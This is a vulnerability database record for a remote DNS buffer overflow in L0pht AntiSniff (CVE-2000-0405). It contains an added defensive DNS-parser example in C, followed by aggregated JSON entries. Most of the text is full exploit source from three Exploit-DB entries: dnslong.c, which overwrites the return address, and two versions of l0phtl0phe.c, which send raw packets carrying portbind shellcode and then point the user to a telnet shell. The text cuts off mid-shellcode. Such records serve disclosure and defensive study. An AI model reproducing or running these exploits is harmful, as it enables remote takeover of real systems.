ID: OSVDB:3179 | Type: osvdb | Reporter: OSVDB | Modified: 2000-05-15T00:00:00
Description
Vulnerability Description
AntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests it performs not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.
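The description says the DNS test did not validate input on incoming packets, and the exploit comments further down in this record add that the first fix failed by not regarding the signedness of the char and int values used for lengths. As an added example, not code from the OSVDB record, from AntiSniff or from L0pht, here is a bounds-checked DNS name parser in C of the kind a packet-inspecting test needs before it copies a name out of a packet: every length is unsigned (uint8_t / size_t), each label is checked against the 63-octet limit and against the bytes actually left in the packet, the whole name is checked against the 255-octet wire limit, and output space is checked before every copy. The limits are RFC 1035 values; the sample messages, the function names and the status codes are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_HDR_LEN   12    /* fixed DNS message header (RFC 1035) */
#define MAX_LABEL_LEN 63    /* longest label RFC 1035 allows */
#define MAX_NAME_LEN  255   /* longest name on the wire, terminator included */

typedef enum {
    DNS_OK = 0,
    DNS_ERR_SHORT,      /* packet ends inside the header, the name or the question */
    DNS_ERR_LABEL_LEN,  /* length octet > 63; also refuses compression pointers (0xC0..) */
    DNS_ERR_NAME_LEN,   /* accumulated name longer than 255 octets */
    DNS_ERR_OUTBUF      /* caller's output buffer too small for the name */
} dns_status;

/* Copy the name at pkt[off] into out as dotted text. Every length is unsigned
 * (uint8_t / size_t), so an octet such as 0xff can never become a negative int
 * and pass a "len < max" test; every copy is checked against the bytes left
 * in the packet and the room left in out. */
dns_status dns_parse_name(const uint8_t *pkt, size_t pkt_len, size_t off,
                          char *out, size_t out_len, size_t *end_off)
{
    size_t wire = 0, out_pos = 0;                     /* octets consumed / written */

    if (out_len == 0) return DNS_ERR_OUTBUF;
    for (;;) {
        if (off >= pkt_len) return DNS_ERR_SHORT;
        uint8_t len = pkt[off++];
        if (++wire > MAX_NAME_LEN) return DNS_ERR_NAME_LEN;
        if (len == 0) break;                          /* root label ends the name */
        if (len > MAX_LABEL_LEN) return DNS_ERR_LABEL_LEN;
        if (pkt_len - off < len) return DNS_ERR_SHORT; /* label runs past the packet */
        wire += len;
        if (wire > MAX_NAME_LEN) return DNS_ERR_NAME_LEN;
        if (out_len - out_pos < (size_t)len + 2) return DNS_ERR_OUTBUF; /* label + '.' + NUL */
        memcpy(out + out_pos, pkt + off, len);
        out_pos += len;
        out[out_pos++] = '.';
        off += len;
    }
    if (out_pos > 0) out_pos--;                       /* drop the trailing '.' */
    out[out_pos] = '\0';
    if (end_off) *end_off = off;
    return DNS_OK;
}

/* Validate a message's question section: header present, QNAME well-formed,
 * and the 4 octets of QTYPE/QCLASS present after it. */
dns_status dns_validate_question(const uint8_t *pkt, size_t pkt_len,
                                 char *qname, size_t qname_len)
{
    size_t off;
    if (pkt_len < DNS_HDR_LEN) return DNS_ERR_SHORT;
    dns_status st = dns_parse_name(pkt, pkt_len, DNS_HDR_LEN, qname, qname_len, &off);
    if (st != DNS_OK) return st;
    return (pkt_len - off < 4) ? DNS_ERR_SHORT : DNS_OK;
}

/* Constructed sample messages (not captured traffic). */
static const uint8_t good_pkt[] = {
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,   /* header, QDCOUNT=1 */
    7, 'e', 'x', 'a', 'm', 'p', 'l', 'e', 3, 'c', 'o', 'm', 0,
    0x00, 0x01, 0x00, 0x01                                  /* QTYPE A, QCLASS IN */
};
static const uint8_t long_label_pkt[] = {                 /* length octet 0xff */
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,
    0xff, 'A', 'A', 'A', 'A', 0
};
static const uint8_t truncated_pkt[] = {                  /* claims 7 octets, has 3 */
    0x12, 0x34, 0x01, 0x00, 0x00, 0x01, 0, 0, 0, 0, 0, 0,
    7, 'e', 'x', 'a'
};

/* Four 63-octet labels: each is legal on its own, the name as a whole is not. */
dns_status check_overlong_name(void)
{
    uint8_t pkt[DNS_HDR_LEN + 4 * 64 + 1 + 4];           /* zero terminator + QTYPE/QCLASS */
    char name[512];
    size_t off = DNS_HDR_LEN;
    memset(pkt, 0, sizeof pkt);
    pkt[5] = 1;                                           /* QDCOUNT = 1 */
    for (int i = 0; i < 4; i++) {
        pkt[off++] = MAX_LABEL_LEN;
        memset(pkt + off, 'a', MAX_LABEL_LEN);
        off += MAX_LABEL_LEN;
    }
    return dns_validate_question(pkt, sizeof pkt, name, sizeof name);
}

int main(void)
{
    char name[256];
    printf("good:       %d (%s)\n", dns_validate_question(good_pkt, sizeof good_pkt, name, sizeof name), name);
    printf("0xff label: %d\n", dns_validate_question(long_label_pkt, sizeof long_label_pkt, name, sizeof name));
    printf("truncated:  %d\n", dns_validate_question(truncated_pkt, sizeof truncated_pkt, name, sizeof name));
    printf("overlong:   %d\n", check_overlong_name());
    return 0;
}
```

The parser deliberately refuses compression pointers rather than following them; a tool that only needs to sanity-check a name before logging it loses nothing by that, and it removes the loop and offset arithmetic that pointer-following would add to the attack surface.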
Solution Description
Upgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. Users may also install the vendor-provided patch that mitigates this vulnerability.
Short Description
AntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests it performs not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.
References:
Other Advisory URL: http://archives.neohapsis.com/archives/win2ksecadvice/2000-q2/0106.html
ISS X-Force ID: 4459
CVE-2000-0405
Bugtraq ID: 1207
{"edition": 1, "title": "AntiSniff DNS Overflow Remote Code Execution", "bulletinFamily": "software", "published": "2000-05-15T00:00:00", "lastseen": "2017-04-28T13:19:57", "modified": "2000-05-15T00:00:00", "reporter": "OSVDB", "viewCount": 7, "href": "https://vulners.com/osvdb/OSVDB:3179", "description": "## Vulnerability Description\nAntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.\n## Solution Description\nUpgrade to version 1.02 or higher, as it has been reported to fix this vulnerability. Users may also install the vendor provided patch that mitigates this vulnerability.\n## Short Description\nAntiSniff contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable host. The flaw is due to one of the tests performed not properly validating input on incoming packets. 
A carefully crafted packet that does not adhere to DNS specifications can trigger a remote overflow and allow arbitrary code to be executed.\n## References:\nOther Advisory URL: http://archives.neohapsis.com/archives/win2ksecadvice/2000-q2/0106.html\nISS X-Force ID: 4459\n[CVE-2000-0405](https://vulners.com/cve/CVE-2000-0405)\nBugtraq ID: 1207\n", "affectedSoftware": [{"name": "AntiSniff", "version": "1.01", "operator": "eq"}], "type": "osvdb", "references": [], "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-04-28T13:19:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2000-0405"]}, {"type": "exploitdb", "idList": ["EDB-ID:19918", "EDB-ID:19916", "EDB-ID:19917"]}], "modified": "2017-04-28T13:19:57", "rev": 2}, "vulnersScore": 7.8}, "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "cvelist": ["CVE-2000-0405"], "id": "OSVDB:3179"}
{"cve": [{"lastseen": "2021-02-02T05:19:02", "description": "Buffer overflow in L0pht AntiSniff allows remote attackers to execute arbitrary commands via a malformed DNS response packet.", "edition": 4, "cvss3": {}, "published": "2000-05-16T04:00:00", "title": "CVE-2000-0405", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2000-0405"], "modified": "2008-09-10T19:04:00", "cpe": ["cpe:/a:atstake:antisniff:1.0.1", "cpe:/a:atstake:antisniff:1.0"], "id": "CVE-2000-0405", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0405", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:atstake:antisniff:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:atstake:antisniff:1.0:*:researchers:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T13:02:59", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (1). CVE-2000-0405. Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 1", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19916", "href": "https://www.exploit-db.com/exploits/19916/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n\r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. 
AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n\r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n\r\nNOTE: \r\n\r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n/* dnslong.c by Hugo Breton (bretonh@pgci.ca)\r\n\r\n This program must be run in the DNS test phase of Sentinel and Anti Sniff.\r\n It illustrates how code can be run remotely on a Win98 machine running Anti\r\n Sniff.\r\n\r\n Suggested arguments are:\r\n \r\n \"dnslong host 5 65\" to send the Windows 98 version of Anti Sniff in an\r\n infinite loop.\r\n \"dnslong host 2 255\" to segfault the oBSD version of Anti Sniff.\r\n \"dnslong host 1 255\" to segfault Sentinel.\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <netinet/in.h>\r\n\r\nint main(int argc,char * * argv)\r\n{\r\n char p[1024];\r\n int sock,i,j,k,len,labelnum,labellen;\r\n struct sockaddr_in sin;\r\n struct hostent * hoste;\r\n\r\n printf(\"dnslong.c by Hugo Breton (bretonh@pgci.ca)\\n\");\r\n\r\n if(argc<4)\r\n {\r\n printf(\"usage: %s host label_count label_length\\n\",argv[0]);\r\n 
return(0);\r\n }\r\n\r\n bzero((void *) &sin,sizeof(sin));\r\n sin.sin_family=AF_INET;\r\n sin.sin_port=htons(53);\r\n\r\n if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)\r\n {\r\n if((hoste=gethostbyname(argv[1]))==NULL)\r\n {\r\n printf(\"unknown host %s\\n\",argv[1]);\r\n return(0);\r\n }\r\n \r\n bcopy(hoste->h_addr,&sin.sin_addr.s_addr,4);\r\n }\r\n\r\n labelnum=atoi(argv[2]);\r\n labellen=atoi(argv[3]);\r\n\r\n len=labelnum*(labellen+1)+5+12;\r\n\r\n if(len>1024)\r\n {\r\n printf(\"resulting packet will be too long\\n\");\r\n return(0);\r\n }\r\n\r\n bzero((void *) p,1024);\r\n * ((unsigned short *) (p+0))=htons(867-5309);\r\n * ((unsigned short *) (p+4))=htons(1);\r\n \r\n for(i=12,j=0;j<labelnum;j++)\r\n {\r\n * ((unsigned char *) (p+(i++)))=labellen;\r\n\r\n for(k=0;k<labellen;k++,i++)\r\n {\r\n * ((unsigned char *) (p+i))=0x90;\r\n }\r\n \r\n * ((unsigned char *) (p+i-2))=0xeb; /* jmp $-2 */\r\n * ((unsigned char *) (p+i-1))=0xfe; /* just make it loop */\r\n }\r\n\r\n * ((unsigned char *) (p+269))=0x20;\r\n * ((unsigned char *) (p+270))=0xff;\r\n * ((unsigned char *) (p+271))=0x87; \r\n * ((unsigned char *) (p+272))=0x01; /* new EIP */\r\n\r\n * ((unsigned char *) (p+(i++)))=0;\r\n\r\n * ((unsigned short *) (p+i))=htons(1);\r\n * ((unsigned short *) (p+i+2))=htons(1);\r\n\r\n if((sock=socket(AF_INET,SOCK_DGRAM,0))==-1)\r\n {\r\n printf(\"unable to create UDP socket\\n\");\r\n return(0);\r\n }\r\n\r\n if(sendto(sock,p,len,0,(struct sockaddr *) &sin,sizeof(sin))==-1)\r\n {\r\n printf(\"unable to send packet\\n\");\r\n return(0);\r\n }\r\n\r\n printf(\"packet sent to host %s\\n\",argv[1]);\r\n\r\n return(0);\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19916/"}, {"lastseen": "2016-02-02T13:03:08", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (2). CVE-2000-0405. 
Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19917", "href": "https://www.exploit-db.com/exploits/19917/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n \r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n \r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n \r\nNOTE:\r\n \r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n/* l0phtl0phe.c - antisniff exploit (1.02 included)\r\n *\r\n * -sc/teso\r\n *\r\n * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`\r\n *\r\n * description:\r\n * l0pht messed up the fix for their problem in antisniff by not regarding\r\n * the type signedness properties of the char and int values used. 
this\r\n * results in a cool method bypassing the too extra checks (length + strncat).\r\n * some work on this topic have been done by mixter, (bad results on type\r\n * casting), but it should be obvious to any security conscious programmers.\r\n * i'm not stating that they aren't allowed errors, but they should fix it\r\n * for sure if they're going to fix it at all. -sc.\r\n *\r\n * greetings to all teso, lam3rz, hert, adm, w00w00 and lds ppl.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n#include <libnet.h>\r\n\r\n\r\n#define\tOFFSET\t\t0xbffef9a0\r\n\r\nunsigned int\tbuild_xp (unsigned char *xp);\r\n\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tint\t\tsock;\t\t/* raw socket */\r\n\tu_long\t\tsrc_ip,\r\n\t\t\tdst_ip;\r\n\r\n\tunsigned char\txpbuf[512];\t/* this one gets complicated now */\r\n\tunsigned char\ttpack[512];\t/* paket buffer */\r\n\tunsigned int\tpl_len;\r\n\r\n\r\n\tif (argc != 3) {\r\n\t\tprintf (\"usage: %s <source ip> <dest ip>\\n\\n\", argv[0]);\r\n\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsock = libnet_open_raw_sock (IPPROTO_RAW);\r\n\tif (sock == -1) {\r\n\t\tperror (\"libnet_open_raw_sock\");\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsrc_ip = libnet_name_resolve (argv[1], 0);\r\n\tdst_ip = libnet_name_resolve (argv[2], 0);\r\n\r\n\tpl_len = build_xp (xpbuf);\r\n\r\n\tlibnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,\r\n\t\tsrc_ip, dst_ip, NULL, 0, tpack);\r\n\tlibnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,\r\n\t\ttpack + IP_H);\r\n\tlibnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,\r\n\t\txpbuf, pl_len, tpack + IP_H + UDP_H);\r\n\tlibnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);\r\n\r\n\t/* they use \"udp and dst port 53\" as bpf, so we should have no problem\r\n\t */\r\n\tlibnet_write_ip (sock, tpack, UDP_H + IP_H + DNS_H + pl_len);\r\n\tlibnet_close_raw_sock (sock);\r\n\r\n\tprintf (\"exploitation 
succeeded.\\n\");\r\n\tprintf (\"try: \\\"telnet %s 17664\\\" now.\\n\", argv[2]);\r\n\r\n\texit (EXIT_SUCCESS);\r\n}\r\n\r\n\r\n/* build_xp\r\n *\r\n * build exploit buffer into buffer pointed to by `xp'.\r\n */\r\n\r\nunsigned int\r\nbuild_xp (unsigned char *xp)\r\n{\r\n\r\n\r\n\r\n\r\n\t/* yea yea ugly buffer ;-) */\r\n\tunsigned char\tbuf[] =\r\n\t\t\"\\x7c\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\xeb\\x01\"\r\n\t\t\"\\x7d\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\xeb\\x08\\x00\"\r\n\t\t\"\\xfe\\x10\\x10\\xff\\xbf\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\xeb\\x20\"\r\n\t\t\"\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x3c\\xf8\\xfe\\xbf
\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\t\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\r\n\t\t/* portshell 17644 portshellcode by smiler & scut */\r\n\t\t\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x09\\xc0\\x74\\x06\\x31\\xc0\"\r\n\t\t\"\\xfe\\xc0\\xcd\\x80\\xeb\\x76\\x5f\\x89\\x4f\\x10\\xfe\\xc1\"\r\n\t\t\"\\x89\\x4f\\x0c\\xfe\\xc1\\x89\\x4f\\x08\\x8d\\x4f\\x08\\xfe\"\r\n\t\t\"\\xc3\\xb0\\x66\\xcd\\x80\\xfe\\xc3\\xc6\\x47\\x10\\x10\\x66\"\r\n\t\t\"\\x89\\x5f\\x14\\x88\\x47\\x08\\xb0\\x45\\x66\\x89\\x47\\x16\"\r\n\t\t\"\\x89\\x57\\x18\\x8d\\x4f\\x14\\x89\\x4f\\x0c\\x8d\\x4f\\x08\"\r\n\t\t\"\\xb0\\x66\\xcd\\x80\\x89\\x5f\\x0c\\xfe\\xc3\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x89\\x57\\x0c\\x89\\x57\\x10\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x31\\xc9\\x88\\xc3\\xb0\\x3f\\xcd\\x80\\xfe\"\r\n\t\t\"\\xc1\\xb0\\x3f\\xcd\\x80\\xfe\\xc1\\xb0\\x3f\\xcd\\x80\\x31\"\r\n\t\t\"\\xd2\\x88\\x57\\x07\\x89\\x7f\\x0c\\x89\\xfb\\x8d\\x4f\\x0c\"\r\n\t\t\"\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x99\\x31\\xdb\\x31\\xc9\\xe8\"\r\n\t\t\"\\x7e\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\";\r\n\r\n\tbuf[287] = (OFFSET ) & 0xff;\r\n\tbuf[288] = (OFFSET >> 8) & 0xff;\r\n\tbuf[289] = (OFFSET >> 16) & 0xff;\r\n\tbuf[290] = (OFFSET >> 24) & 0xff;\r\n\r\n\tmemcpy (xp, buf, sizeof (buf));\r\n\r\n\treturn (sizeof (buf));;\r\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19917/"}, {"lastseen": "2016-02-02T13:03:15", "description": "Stake AntiSniff 1.0.1/Researchers Version 1.0 DNS Overflow Vulnerability (3). CVE-2000-0405. 
Remote exploits for multiple platform", "published": "2000-05-16T00:00:00", "type": "exploitdb", "title": "Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow Vulnerability 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0405"], "modified": "2000-05-16T00:00:00", "id": "EDB-ID:19918", "href": "https://www.exploit-db.com/exploits/19918/", "sourceData": "source: http://www.securityfocus.com/bid/1207/info\r\n \r\nCertain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. It attempts, through a number of tests, to determine if a machine on a local network segment is listening to traffic that is not directed to it (commonly referred to as sniffing). During one particular test there is a problem if a packet that does not adhere to DNS specifications is sent to the AntiSniff machine. This can result in a buffer overflow on the system running AntiSniff. If the packet is crafted appropriately this overflow scenario can be exploited to execute arbitrary code on the system.\r\n \r\nThis scenario is only possible if AntiSniff is configured to run the DNS test and only during the time the test is running. Nonetheless, it is a vulnerability that should not be ignored and has even been found in other promiscuous mode detection programs as well.\r\n \r\nNOTE:\r\n \r\nThis information was taken verbatim from the L0pht advisory on the subject. This advisory is attached in full in the 'Credit' section of this advisory.\r\n\r\n\r\n\r\n/* l0phtl0phe.c - antisniff exploit (1-1-1 \"second fixed version\" included)\r\n *\r\n * -scut/teso\r\n *\r\n * gcc -o l0phtl0phe l0phtl0phe.c -Wall -lnet `libnet-config --defines`\r\n *\r\n * description:\r\n * l0pht messed up the fix for their problem in antisniff by not regarding\r\n * the type signedness properties of the char and int values used. 
this\r\n * results in a cool method bypassing the too extra checks (length + strncat).\r\n * some work on this topic have been done by mixter, (bad results on type\r\n * casting), but it should be obvious to any security conscious programmers.\r\n * i'm not stating that they aren't allowed errors, but they should fix it\r\n * for sure if they're going to fix it at all. -sc.\r\n *\r\n * 2nd version: script kiddie proof to avoid that \"doesn't work\" lamer claim.\r\n *\r\n * greetings to all teso, lam3rz, hert, adm, w00w00 and lsd ppl.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <netinet/in.h>\r\n#include <arpa/nameser.h>\r\n#include <libnet.h>\r\n\r\n\r\n#define\tOFFSET\t\t0xbffef9a0\r\n\r\nunsigned int\tbuild_xp (unsigned char *xp);\r\n\r\n\r\nint\r\nmain (int argc, char *argv[])\r\n{\r\n\tint\t\tsock;\t\t/* raw socket */\r\n\tu_long\t\tsrc_ip,\r\n\t\t\tdst_ip;\r\n\r\n\tunsigned char\txpbuf[1024];\t/* this one gets complicated now */\r\n\tunsigned char\ttpack[2048];\t/* paket buffer */\r\n\tunsigned int\tpl_len;\r\n\r\n\r\n\tif (argc != 3) {\r\n\t\tprintf (\"usage: %s <source ip> <dest ip>\\n\\n\", argv[0]);\r\n\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsock = libnet_open_raw_sock (IPPROTO_RAW);\r\n\tif (sock == -1) {\r\n\t\tperror (\"libnet_open_raw_sock\");\r\n\t\texit (EXIT_FAILURE);\r\n\t}\r\n\r\n\tsrc_ip = libnet_name_resolve (argv[1], 0);\r\n\tdst_ip = libnet_name_resolve (argv[2], 0);\r\n\r\n\tpl_len = build_xp (xpbuf);\r\n\r\n\tlibnet_build_ip (UDP_H + DNS_H + pl_len, 0, 7350, 0, 2, IPPROTO_UDP,\r\n\t\tsrc_ip, dst_ip, NULL, 0, tpack);\r\n\tlibnet_build_udp (libnet_get_prand (PRu16), 53, NULL, 0,\r\n\t\ttpack + IP_H);\r\n\tlibnet_build_dns (libnet_get_prand (PRu16), 0x0000, 1, 0, 0, 0,\r\n\t\txpbuf, pl_len, tpack + IP_H + UDP_H);\r\n\tlibnet_do_checksum (tpack, IPPROTO_UDP, UDP_H + DNS_H + pl_len);\r\n\r\n\t/* they use \"udp and dst port 53\" as bpf, so we should have no problem\r\n\t */\r\n\tlibnet_write_ip (sock, tpack, UDP_H + 
IP_H + DNS_H + pl_len);\r\n\tlibnet_close_raw_sock (sock);\r\n\r\n\tprintf (\"exploitation succeeded.\\n\");\r\n\tprintf (\"try: \\\"telnet %s 17664\\\" now.\\n\", argv[2]);\r\n\r\n\texit (EXIT_SUCCESS);\r\n}\r\n\r\n\r\n/* build_xp\r\n *\r\n * build exploit buffer into buffer pointed to by `xp'.\r\n */\r\n\r\nunsigned int\r\nbuild_xp (unsigned char *xp)\r\n{\r\n\tint\t\ti;\r\n\tunsigned char\tbuf[1024];\r\n\tunsigned char\tshellcode[] =\r\n\t\t/* portshell 17644 portshellcode by smiler & scut */\r\n\t\t\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x09\\xc0\\x74\\x06\\x31\\xc0\"\r\n\t\t\"\\xfe\\xc0\\xcd\\x80\\xeb\\x76\\x5f\\x89\\x4f\\x10\\xfe\\xc1\"\r\n\t\t\"\\x89\\x4f\\x0c\\xfe\\xc1\\x89\\x4f\\x08\\x8d\\x4f\\x08\\xfe\"\r\n\t\t\"\\xc3\\xb0\\x66\\xcd\\x80\\xfe\\xc3\\xc6\\x47\\x10\\x10\\x66\"\r\n\t\t\"\\x89\\x5f\\x14\\x88\\x47\\x08\\xb0\\x45\\x66\\x89\\x47\\x16\"\r\n\t\t\"\\x89\\x57\\x18\\x8d\\x4f\\x14\\x89\\x4f\\x0c\\x8d\\x4f\\x08\"\r\n\t\t\"\\xb0\\x66\\xcd\\x80\\x89\\x5f\\x0c\\xfe\\xc3\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x89\\x57\\x0c\\x89\\x57\\x10\\xfe\\xc3\\xb0\"\r\n\t\t\"\\x66\\xcd\\x80\\x31\\xc9\\x88\\xc3\\xb0\\x3f\\xcd\\x80\\xfe\"\r\n\t\t\"\\xc1\\xb0\\x3f\\xcd\\x80\\xfe\\xc1\\xb0\\x3f\\xcd\\x80\\x31\"\r\n\t\t\"\\xd2\\x88\\x57\\x07\\x89\\x7f\\x0c\\x89\\xfb\\x8d\\x4f\\x0c\"\r\n\t\t\"\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\x99\\x31\\xdb\\x31\\xc9\\xe8\"\r\n\t\t\"\\x7e\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x